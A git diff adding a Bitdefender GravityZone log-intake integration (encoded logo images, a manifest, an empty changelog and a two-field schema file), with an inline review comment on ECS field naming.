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 literal 0 HcmV?d00001 diff --git a/Bitdefender/_meta/manifest.yml b/Bitdefender/_meta/manifest.yml new file mode 100644 index 000000000..1a00ddd37 --- /dev/null +++ b/Bitdefender/_meta/manifest.yml 
@@ -0,0 +1,5 @@
+uuid: 26277889-b91b-46d0-8bac-7f6b2f6fb9a3
+name: Bitdefender
+slug: "bitdefender"
+description: >-
+ Bitdefender is a global cybersecurity company renowned for its advanced antivirus software, providing comprehensive security solutions and threat intelligence for individuals and enterprises, safeguarding against evolving cyber threats.
diff --git a/Bitdefender/gravityzone/CHANGELOG.md b/Bitdefender/gravityzone/CHANGELOG.md
new file mode 100644
index 000000000..11bddf32c
--- /dev/null
+++ b/Bitdefender/gravityzone/CHANGELOG.md
@@ -0,0 +1,8 @@
+# Changelog
+
+All notable changes to this project will be documented in this file.
+
+The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/),
+and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0.html).
+
+## [Unreleased]
diff --git a/Bitdefender/gravityzone/_meta/fields.yml b/Bitdefender/gravityzone/_meta/fields.yml
new file mode 100644
index 000000000..57f24a53a
--- /dev/null
+++ b/Bitdefender/gravityzone/_meta/fields.yml
@@ -0,0 +1,9 @@
+bitdefender.gravityzone.exploit.type:
+ description: 'Exploit type detected by Bitdefender GravityZone.'
+ name: bitdefender.gravityzone.exploit.type
+ type: keyword
+
+process.parent.path:
+ description: 'Path of the parent process.'
+ name: process.parent.path
+ type: keyword
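Review bot: `process.parent.path` is declared as a custom keyword inside the ECS `process.parent` namespace, while the other new field in the same hunk is correctly scoped under the `bitdefender.gravityzone` prefix. ECS already models the parent's on-disk location as `process.parent.executable`, so unless the platform's schema already defines `process.parent.path`, this field should either reuse `process.parent.executable` or move under the intake prefix, e.g. `bitdefender.gravityzone.process.parent.path`, so a vendor-specific key does not sit next to and shadow the standard one. The parser that fills the field is in a file not shown here, so whether the value is an executable path or a directory cannot be confirmed from this hunk; the description `'Path of the parent process.'` should say which.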
diff --git a/Bitdefender/gravityzone/_meta/logo.png b/Bitdefender/gravityzone/_meta/logo.png new file mode 100644 index 0000000000000000000000000000000000000000..dd360bce9b147401e7cd703dde3e550bf835be78 GIT binary patch literal 30360 zcmeFY_g_=l_dR?81sw#&vC>3`07jaC)KFArkWiH-$#>zeIC$&pCJBz1LZLpS7P{wYwtmi_9+o z07$?s|8M|+{op_M0|!LGkCSY{1^`5P!T-2)J*HrBGP=pv$-{KXZ&>6j1gT zSiT0I(wYeq*;`Iyluft*JG4ApFU4zcJfSp^_&fq!)-Q{r%_2bBuoHrI5cf(9>fUwG z8{15=S@r$41X}3)B|#SZ1Q7;4YXaFDt%=`_yQNz0CUw{J`Qt=%s}|SHyn?s}m(1su z3+0OQAhD4QRAzO(Cu~(m80egdvRbK!oWSqyp9{AFJ{+CYr9k}!TX{E30vZTnH>+6s z6pFvVqn-5|AUyQW4qk;}H$X?qPt{)S$YQ^QwCHi9ZF+Sv3BPkS&*iuZU&PT%6rb(MmGIk<4HIj?kI0B3{`ODtCc_C3!Jgv2_cGgS=DnEdu^VgmwQO{zGR#Cc5qM3dU4*FZ&>WI1mL)E3T|h~TV5-}0>4@W*rHF6mfjUK zU7+k27wo1%I^185pbMHO1esYaZdAJ`(Y;i?rirI)A2?r+vfxKo|1$6fihF4MJn~Az zC%qqrzB^Iym37EQ=;Sk@T?=$*`-k~6FTkFpo~mxr4?gjA{WyJqyd~8vZ?`d&ka%U?2H9{Fq$@#<;2JWW(i^TJkAq@=hq*B73YzdoHV`#W&E zbt!8r{(D?wUV$NSd^H(+Nu1ch0SEq7c?J)+v*T$VBGrOHD2{fI=snS3ZV%sGjZZ?$ z(hLl8n<|vHycsB!UjXS6RYK6t*!JqR7Jkxk6{%!mvo$(mgwIPd-+P~iSNkF&t-w5j5C`a$(?oH~P8AZSD#?f!Iq zdQ13X?o$(Vt0uR@VDwvn2i2~DZf_Q4ztUE3Qaz}!bM}Q)qixIUy_wPmAB^xB&uzV80+rU*QIGNDE39p?9%6WeLZvHn)CVUei3^@Y{95HX3w=R;4N$|n7803UMQ z&rk+O`1+MdlkhRW!^vea!HlG7alrdu{`uf5cVAA7!Qo5AUl}H|F8W^;L`@yPy!ZCs z*t4Jw{~Q<9;!4-5FnI!~QIg;Tb}h^CLZ@xU+t3A=^%EHZdTUh>o^KrgEO&6S+en?F z(RE7W-fW%!s^Kv}`#3T5UAKdZic4KH;$Y`*Ci>j=<^9R$9bjsorVaIw>V#rR)`@R1 zH_@6Zq))yU*?(_{0uVcg zh8}1yO@?Y(u6%_|Tg8s^9zZ&5T(;*}*va?}E3)snB4rHY?(?E5i#;zc2r6HCR;wiq zbn%?ko(Ko|8VcP+yJOkj@FXl-x^7ug!dQ_q0Oz;vMRyz#_WEy5;}T%=E)N7qiCs^Q zq}u0yA)&S_OIYakiQt84v%nWud=-;@!>1j90L^WrQ^!lP`%DJ#u~I)6zZ zM~WpU?SxSGyL0|58w>hYCcXTb6>7^{twR#~hY3Sn#x1^#1PhZNcv6>x#Sn?##&Gsi zicO*#HJBTnos;9YL_;bts1#YC8shr>X#u}W^J*8f$#Ub4p;^j!+F!MthI~$Kcqk=>h@l7pLDr^3A*>Q z{P#z@rOFnSTf9Y4sq1`2$~DjvgaX~7f#i=2MT)xY#;1QFQXgVM-X#^WTWN(rt`4DL z2{?bM&b4ci3+MY=pi&#Ep4Oh<%yNystZ` zO?ng^-_4CXoM-T*(dHxK-6z$=0ip4Hrd|+l93mKcod|T#4uczFw-0RuF@C!#oH@;Z9tg2qX@{WB&vsbL((PA9A({cKObjN$gklR0Rf0e#v`4CBe=346 
zX_a(D&ZqGuFIHz*PV6gvqz~CjDrpcpsUURvy8t(LbSAz1Lg#d8Awgw=5UJvzmoJ?f zt>iM@e5Cj8J@B#no^{ERTFy|WbpvFR!vah&;wPV-5$-%9x{0f=i$<%Emi|DaY{R2C zb`X~w_Aw%?<`7JY9L=!lo7w6PA`C z%TOSwot;`aI826~xyecQoyujWr1M_OMO)UQ{x?S8g@6tDbjE(*rtsqffaa;0P>nG$ zwDD_iUcAbLJ|#(95L*UuvJLO=|MndMYxp+vi+nEo5`1d7NkP+UmCjnHQ%0k&bXVf0&P~2aX z^`n{@(F1V`nS25fVA%U57>Pb;LD0}r01HAH18LRGfyJ@s{h?(+!r%#2stky>v352q zI}kd2<%)mH=#t>xvHfI)Lp(xc`Qt|Mqj8GQEN0lDH; zgayt7Qry2G`gbM|CL504+Bah; z!Pp1fyu2@Yb}a+j$*u3+9cN9!LqO+ui$S89kgd0e1oP1tmLjDNQ(63Jn)vk#=>ECp zEqJxOYfSS0yL&wgn|?XzW3wWT?6L=Ws?aktC76WxW2l995PPeGh62B}$$)SF|IPXV z(Lp-k$>K?Ap_$EH14^i`vHeEqaI=V8%^4(NYTELkh(MjPQM>DL7=>o9!I#kNe7I-U zZSLL4%Fk4I$mHH@yJK4t#RU!loqFj=6a5A*4qo(>txklY+07sd?<@9t37IgXJcCPG z9_*$m8^S2k&=%#Qsply37O#gqkY9HS3(eeX)ukk&jbDYCW!z!$!*|b72(Hop*6tY? z{5zRBWpR*{ABX5IRxzv&Q;@W3(ajid2fd2~LK^@i|M;Q~EKZigJy}gsfe!c)ZM%-V zT5%=t(nU01xHHyyAMcod2eTNs+j4c*gX=k7) z2ovD_qr0Xe{)at#zf=MWs@h~oJfa1+ zw#gjLs{H@W_#0qH_fBW*-YSW5VSUW2?hgfjos49ZM~XSuaC8GURMQ#AFq(kF6oO0I zAKa0G*9zX6F;(Yy@q>?0p|hyzr|d;6$!O4KB^5$|Y=xnhl?=~Nwp|PTu1ng5_d}fQ z!n3d&AFJT&lb@%VP)f#L@@9t?$G8`)v~T~3Rw!%D)TsLC|MF%dcCdR4BiD4*$!aUX z-8&Vv@fN#Gzdho|uEZ`gM;!FvFx_mcyl9>ZIRssyME>?x(B?mZFmo@@TPASn%w{oDP&u~Gpxw|xn<&*1a-;@bb=m5#UV-U zOOFOTq=>C79$A9*c-z=|$t7I^dg7!Re5DIJ{b;b1HPe~vp*sg#?-q}|P3_8Z8Tgxg zfntwIP?>wv+lWqpDj5*WT2w&327{1o(bJY&CSK(_wO`}cMxfI~z3B>{Wi0*fZ0JI| z!(Sa9zTX@5OA|B`bmn9hSE1E4DgL|UD70JYPPbeZd)s9)`t7X&``FXGN$hlfD514D z$#6F6jt?C>jb##89EGebb;0^9me)QA*}8MQYGi-%$i2q;y!PE6Sm1tGlRdi7E&8ux zOr^Qr-A43|FLi&{P}Ng*l=xabBu8n>9lfC(8&AdjiC@rnn7R@TKd9dzN4gLg=uq^B zr~2Gmc9^(e=O^~&)(G4*JNz1haUW_w6*$py%MAxRkF38d;YUb|!Tn`|W<|VM!m?eD zF<8hKg@H=3oxXeb;rIghRzgC@Wv`Rnd}uW{5m7~n27$7D`10gAO0n8bodRUb65Uw( z@QOw5K(_`|e|!TTPRG7EW?=7O0Oxk@m8Io95`X8^ifl2XPxF>tFRB~WA3{5XHvPbGHg*T57HD5Y9- zv&H(y^wwG`(G$%0AIR48#NeJL4>}?$ARVv=9f*-1aL?v+fq)O^mpORpHHT5}uH+}7 z!&ir?3WT((+}aYfu^vScfq#|;W|)E;wi&ur6^ADiX*UoSsbf(%ERO3r389oYB&|vY zGP8(A8WcA~h%1WqQVOgF98PB}jftaoZgA{^x=z7QVZ#q6=3rI6`rNxkjpo7}EDmHq 
zM_n-5t~Xx|P!_8((UxRrd=S-^p=R-j`0gNdx;)hKpr}hxp~GMKS4#JV5%q4chMTc2 z(xEo7r(qR=uOYD>-=?G6G$_kALhA4$7-M54XYvi|Fx02+4Du%(hDh>r^+*Z+ss&#H zcZrI77HG4AkJBJ2=C4QV@Sgqa7UzlXkp3*?1)YAD7w z=>sp9eQJHsJf&C^^-w--88b&afiX5+tL|#}dBPv1;pk?DdlPE_p{OGC>9I?Pw%g7M z&AjHD1`lvyeldsW_IUy0+g&XMuGE)}Jc1gF(Ohjp9~JJbP>GGj^V$tGDQ3Qrm!1Q6 z*Q$!OwIg0Fm-KV`u)x>OyrLIGrq-MZYr84_mDc{`meRBj+i{HI9G6iBHgJO3w*ny! zc|!Gn5Cev2R3)gYT^Zb%kb@pi(=o#+63_yP+5U(IPRK(h9wopn-pq z_<$xU+lae1KT$98JU`J^323!KqpYP3ncD^Z{|;EKEVxWuHxinm%4e;7M|vStFGPPIJ+X;tm6ocN_=J>fiulr?re;`R{CJ{j!4oH;i zEsq49l2^Gh9v^m{%7_E2NhFtG4=npnmo1q(;m)iHO-h7A)qS@PvBxh-&`+CdzL9UU z{RP;$L$1XsS)*1WoiIE%)H+9K1|=1FRq@AEyV-F4tD9ZNbkV9krr{bTn$r7$PfZeMb5bPV;+Yf}0e%nECVkRV^O^$!~BccclG z)?>UDAPp=%Wk;h6>Mc9si1rZjoSNO#xy9mI4Hr&C&8VwC5VHnRIC)9ngdpH6ZS|_F z@@q|RWl9a$S;yv*+=V;mCQK+J2))*T-F!Ou49m~PGA?+Oi`|Zs%FC7omh#z1e?c1r zD9AOlYFRb@s87Yax{!VWLW|k5)?d6bNv3n6+~l#McQ@i@p6 zg~?9;M9FN|-h+S?C8i3tKlw;_O1=1p4Ew^u^pLEu%sywzKx4~oS1(`0OD)l4C(DUD zH>dROZ+TO(8{ETyM*r^c#=Y(`T8(s4^y(y9Ze-Jd;7$_h+;yOJ7Ni`mVOHokp!5gT zKyctx3LG94~Z+(2c81)bA*s0-&CjIg%i9oIr9_Tqrm+q3~%@d6% zS&d;;`;t>(XOXl^9C~QqT3NlD?Drz+<-T0*{^Sj+!Sdn#$%+l;XhIqH!$a|rsQB+H zNOwgYM_E9bGKneB`O7CSJpBy7GDH&EXbZQ3)}CR@ue<#QcuwU*P=#TMJ?W(O+&N-o z{crSt(s9`cbFpN))e7;j+``dswGexk3IC$<9=yALgQ~iLaLpy|UM*x0v8>ZEa z>s0|AtJdD(kfZS(JU^n0Hqh!d?{iq-Lhn$S@ZTcD<3q4)F>nXayUi4uG1uZ?BNOD;m+A)r)Fi^;R8f6W8~%EZQY_2LZavM|a8~A8BMJE44CO>L zEKSou0&iAS$zkX2!IqIlJnl_Uu~m zbqnE6+o~cq(_bKCTccs=A{S=~gT!95flYc!90N?1D9wlErmu5Epd-J#F;pp6M)>YQ z>OjI()@E@*?X%vaCfcjAQyQcJczCM%01kLP4n_9Aqg8*zatwP-Idu^gSh2Un!8ec9 zP610fKaBS=T@M0RZl+*$pJz}E{_2nbYxK2(Qf&+EZU;eO|hVCBsUMf#5`UlTkwLro$m! zZgwr?kKWbS&Ol5`eMh#Ob)xsD$b9sb?pkSUq7FumG(kQBWH0~OvNM49tnG_1v%Z3q zJ2P`jXeR#3P&GFTc>U}F+SqvR;JfkTC^J>cS_8VD+e}z z)WgKwz~D~pPim;72W|bEKHfF!8cU9h(<9EAE(^^}!A)`N)o}Z@VPuJ&|%TF6x$Q#Z%_{G? 
zF&^8HA;BI4-?QQ1zDa-HW2A}1P7Osp(S6WR>9Q{w^upBx8D$IGgY{m6Tc7+R7G*^` zb>UN!FQpJKF}42W46Wwq%84e%b`*8Rj>MD)sevCAeSzrpposIsI!V{JdJfC%7wLrB z>`pp+h$aVYMTVhyYTH&BBW}a<#uD;?^4#xzOV62Au0k`Cd9)MF%?Tt)0HtWLF6q%> zDedjrbws;L{);Ou0Gt?F^1w}@$9S|ZXEXm0(iT1IAZXGTO-2np=a!FkXz+)1qbJ7? zCs4T3y*T?TNecw~F4M}=B9M-|&(o!$BQH(In-zP% z&(q{j4w1nFfLign$K8o}(S!XLEZ%F|r9cezI@)Em>!P!;A5C#x1gMo5*{3eHZlej<7eqfbWZX!l8VRN1TUT8P^f!>B) z9{FRO4i@T+5h6Syc4k2Dza_avKcsB8K%{~upBUDn(9vKq%7Ga#Q&0XVqSKzDVqJ^i zNDjS2DQ%Tt5Bnh^T+s*zn#kgW8+zyL+`*TpUlb`~T1~lh+gtgx(#1P**JqQ0dNsjv zD{}iSm{sSm%$$MlPOHo@ZZ2b&i@MP6>cK@z8e_|Zpt$cW^;96R@CM$T+1!0?ZAC#acTu2C`!whS6V3+(*xni)C)$i%Xt;ogCZ6n z^q1pPqm%k`tA>wL7BwvkZHvB)fQeUIq)Njq0d8kQmV~JzF}U<78<*b#a>z1y_k?O=2McLO+vuVQtX60yqyvIGeuCO6qr$kOug32QuvYs{+K5 z!9z3;>WK<_yp7*<qHEKH>%9^H{kD6DcaCyw zAa(mHOk>qK`_=|Fa$^cx`_Yv%JL#MQAx{B4Ek`vyZYkVg8ifaH-rV0p*r!Asyq|A7 zCJAg0C6taPbXhDS&{WSsc8rzU^?D&8}G8;H()<{@5tK1iyx-OMGO$A={lRd2die%&_gI<+*{H~U~bD;sz{>slOs zBnHQAbwsSuM$HHy*SI}mXHA^;QV;xFVN@QI5VEgFFVz)S8#0!uU*UDT0P*|ds(hiD z3Nho1G8!Gj^8O++nGr}(+c&vlT!7vd7fhd~#Oi$ET@Nr6n$gwCST5GbSJLU!A}DMn z<5S|w7x2lnGF`mA2o5JSu5*$q8wMVQ6Fbp$x| zgRIlv?8v9LkU=|UdP-GRcqVJx-Mw`v$92kVDD0=RaHk}P0A*hD@@uIcu5W{`4RTKk zcb2;6CMt2K1Bn5D1K*{t+;#6IM#9_k*jZ57(=0vY_1=c4sA+v<#6MyxvEJ19xI_B$ z<~NAI_YnX1nn)L_)b@b6!WV7h^GI)w;{tnYkLTL_h`(J%8U^m!Qva^YPBbw@PL|a) zSy1b@vKQEXKDbPkz1&1frb-#r`H~co-H>X=o674-I!AwJ6+_|mC!ZTJB?06qbYK<=L$v+S1Z}M9n9C<9=dg+rKZUM z=~2Cm??*7ImA5uTxgqs)8EF-f?;(TvKc?lVkKm@*+L5ndGJe7(qwe@O*@>TBt%20P z+BV=Tg5g1<7o^2}_6`5Wim#duZyPi(1fT+^3bmDH3;lJ@{V0b{BUEk#t(rOD4Lw_K z;c)TJREfDA4-jT z)EoBWtze$FwI<<|VY7mRF6_=%EYGuIqo|Lcs0Ue2khVitIk2sUs32)KO5Y}^Y$2(l_u#R2YX>iLaVxy=@yqf>qQwUl0nV72 z64_s`O?v*lRynGwM_c%A2^~y?mV$L9tN!&X-Cc-@UrUFeo@ze|vV`H?AGT}GvOI#w zH+=TZcCv9c};cs~Q5T6PrwUc<$MuoZGn)roLa3{PmSK zE3vXEt|3~TT8C~d;M33sF;8`_v9y)`2uQ3<9os73NRDl+S7;-(87a>3O1rxXIm%l- zKedoe-3K~lODCJ7PbkH{`<~Kt4pz!#OCIZywg+4-;#F&Vwm-@#cM}FG97+obi1yFw4Fdb z&p%#;tBu&i(%I5Rfbm%_{wm67WGll9qn8@tmA?Y1$G15|xd#6zI_U;%ey-;&nw7o% 
z(N7H?UW#Yu9m@zU!AZu*)x9FYJ)f~V?+?7Wm83d5aWP=EdEu#8Tb@}(j7={QtTlWm zf4+I8BQhSJb~|+IS0w3%B4FI`v8J$iJy1jQN^i=Tt_4is0oE97J+f=xEEMYO*!&9; zr}WSZ*F}Uo!$y(Nz~!AwRE>KkhRSP$3t*ybGVF_Wv=^G0ChRWUtJ#L5OHyEqNJDL; zj0Y#87A<20?9eTG*2ssaU?N(dPtG9Sjlmpa5u| zu@L0(xY$&%DB43B-gcn=y}5J%=<(=LiVdRnk6)L^Y%c_-3C&132#kOJ2Jru6ppNTT zEBLZf|58Cxf1(JxWY++218;A5^P>R6juSbBkf2-c`frf*w_^L!w%b@T)*$1jcBL_T z1o!JFuKHw8J>6d5a&Ba(k(1v0xZ1U8%}!iOwC%3L%{3o_4JRx>2x&70`n31Zk!L+S z^0msy)gs4U8@0yAhk)g=FS-2iPM=ra#Sk;Q-PLvU{mhEFqYGuUGAO-dGNe-#D6lBZ z{lPk~Mh64Ez567Pq_Z|?E(P*-=tz(oN>raFrd^nxKr6MW2@HGC!IC)#7(;?JIu(qE zevCTCmyS@%c62q2OA^(U#P{B>$Oy1NJ*J%cLln45OHix$k! zSg~!%U?$A;-oBp38aum*Qr~kS&)5Wi)Kr6$xoC26z+L0zfz5VJ$It6f#MQu}79H)y zMZBM*Y0(@_(?KsuCSA+y>rLkr{6j;q7_XepdrPeZbu~|#qr2;t-kOyz?u!lC)5$!> z%D)F$za-UodjvZf92ggmj&=-*I9qL*6Edf#4~b2nR^=h0 zlc;A)8K&5CYKYLpV4jE&W&BcuE~ogHm*UhweM(Op|tqGs8{gI9Qv)~6Y`3Pqy!R^Qlc-&)jryWqHsLK0Q0HJNfd}jx+n~C zA1m$0mG!`K)G55_{>|_86DF~}+n5(p^=PnEpu-(pxTX8<=uFQAgA6U!0m)Az<MAF6x-7{7Cj#+%MlHK|xS+PeKS<1PnUl27Gs8a97L}uVpLLKHb@4Bo2dYIWmd} zno{?I)Uywc*P1?K{~{vqW!plKv*xUloh7vPZ(5ai+@C%%+%r0@KE{{x%wO4-@J>S{ zcNE3Z3wwR{oyIW@N_R|&Fkz8cO9pD$M3d4hyW#B!mR}SZt!Z&_?sMyQ@D-!CoZjYr-eXN~7#nlKfi zu&&bwbWG!wV?(KSh#_2wY@=Wsf*NU(s#|{#>A;w3KGlnMMl-L6tQHT4Hf_Hcl?aWS z_ybva>KeIi71P=jjw1zGx~SISr)>nio$hFDhui0-irEhza}{!LH%bfonPrv77*sfP zd9A#%rS<5EQsbFz7f#0YtGwv>I_ZT&uU$67sE^HccOB=}U7OC%#YK!tsq9Zy^XNso zm@rKvQ}IE#3!Ughy7IKmM6t;9yrQm1rw2l>%6omO==L%-nC~{X9>8EG}c zbC^D*2Mn)c0b*}(xVel9V#to*%#miT;`>J&Xt$FtaWeXb3K29y^&A?aP(AKx?PWQc zZWj8i7GiB*qB>~hq8+Ra3OhQA*at!Jkc5~rIh>j=L$?gyh0txo*>BAh>cFau*4)9q zuymeq?+w+P)hV9pwMDU%a{fxwT^192`8D8qUuWz{pI_Me2c)iz)kLFRiMEhw@ zOz=`4#IH0hseF$1RTJ2`ir>9Bw<^Ib8avP_KkR#?p_ni|`L=Nm2^~2s6~fANDQ^p5 zH9Gj7?R%hbJtVXdD^0tM*mcnLbK{=JIx@KKu!=!OBm!0P91`ojjgxFS3bJ8Oj$PkX?sQ)0^^oea zd?{~zqgR)3=43Uck-VcqGcg5E*&Pm--*h2N<-i~VVr;4~TN1jtRmT;9O!!KwC^zGM zs%!L33)eK)mu+Vwtj#J|Q`fSX91rebkG^Uno$(}#340YDubc2HQq1@HSZA_J`mleP zM3gJOZGASN&6NAstP8`0BB9!7XivWha(cb$uP>=wiLd7HqzO=Zrv%7VhbnI|A#|IG 
zwx1XYP@rW7??{aqF0Lr!U-(-B?&(VIuQAkHBOE{U$s&u%e7f~Z#$fsXtzzO7lzvvX z(1F}W3qYAl4hBUh1#{DW{($|&(Bz%Vz;o6L2aC7;71rq1=13La8PW0eMi*VX4y!d1%wy>`#i(Ty?c=BPs zs<8GGRaItPDEsqw(cppAdQ5+tI>ijnjUEf|s1A>Z;WG*A)?=S9u}SCx#`DRkQGO7F zQaJ3ZUgH=t`Mf_+c`M*SRLb{BntblFBW}?*vocO2}V!JV2@FG1r{| zFeMC@t!Gl(B^XT2HNvSu#tEH|x)z|6q)v}ghd8dA6i*#^OEgxc$ZFRVhUUWP;5ZEI zwH6z}=LkB)iO8BSf+ux^<5uUt5n)45j!QW$)m%M9h;r5`Ezc}qzFa?0=)y2tBV=_{ zgva}=XWMMZsQItLReQ&B4}fxH}Cb)lp7(- zb$NUQ(PjH8N3!y*_Yc@aiMd0Iibo*Bdv%TZ+608-ud54t!%kZ^edgeGCI*O zE!1?c>W#)S0up`Kv=-qDaV((8*1oLpc1k>#cYqE9y9;{{&9ql>b_4sGDh1f@Me&Oo#Z!55>xc)!{hA`LWc&HrMFnOM50*t(RRk zHaxv+Jla+YM)mDP(D0YJ@)nt3@E^5Vlj#e!>5v4?dZYPyq?n^QFrHb5F|PLJNr57| zAY1MlRHfzAyH323O;RIG{^qYvHWQ!nvfMDYb3pOcuP}TusgO=u0?4=K){~scZP46r zy1CQ2Nn=ye3ABOG$@^o!0_$^Y{`%Wr?tfi)qP6=n@zWND%C&tz2qMv=hkxvTQ<}Mh z%-QT;o)`@sIGLG0Omt1oUs~&tm zx}?w*j~I<5EQk+hI-c$R22>4z8vM@Z_@s#Ln9+n^c@_Tz+x8!gwuq9TX-ehEth@oU zUhueViSatv*@k;K*$=etIefFmEltjquvp>Fu^$s(n4sMLqJDs93R#rd49x%v7L~<= za;9@1?@Qj@a%XttPB&j`0p}LEsQ*5-nw`CfeoIohS^0GDw#9AZ zhfr`3{8Em~K8daS%Y%>L?c*mt=1iGQLidZIEySYo<$X-e(DnSA(r$Lqf%wNqJNKm7}ea z%<5Zi2%Yzw^Br2dwVroCB$G#q?|dr>}Q2x@;7=T|>!3Z1TV zSTza~oSbaaMYKx7%=B>Ivi@h-#OCMTOs7!Lp%=ML@s>C9{Q=;G8EDv7yWi82 z#@bcLc600anOAvBr1I%J(=nFZ-|7bd-e~v_U-M;Yj92N>&-9d_|JQ-4VMX^ zPp6HSgU)o*X4%&<38e2hComH6aT3{^gt#cLsh^J`8~Fl*nlDW(r^Io_|N>PL_jc z8h!JB4QY>PDqFE&tD9vZ*u!z?^CC_Dxhg2oa4YTWzKL-ofp|EYB)FP#ZC--A_k&x- zkAtg&$Mw|a3Gfi7nzr~dwWb7@_j)~x>)@kUsg#B!$0nf{oPt6<<-xuZd4m_1aK*Oa z?hm3CC|^NecM1?Q040uY=#3j8(Uno~@LpP>^P?lO^;`VWVv`G@rW4H~t2UsK&1D*b 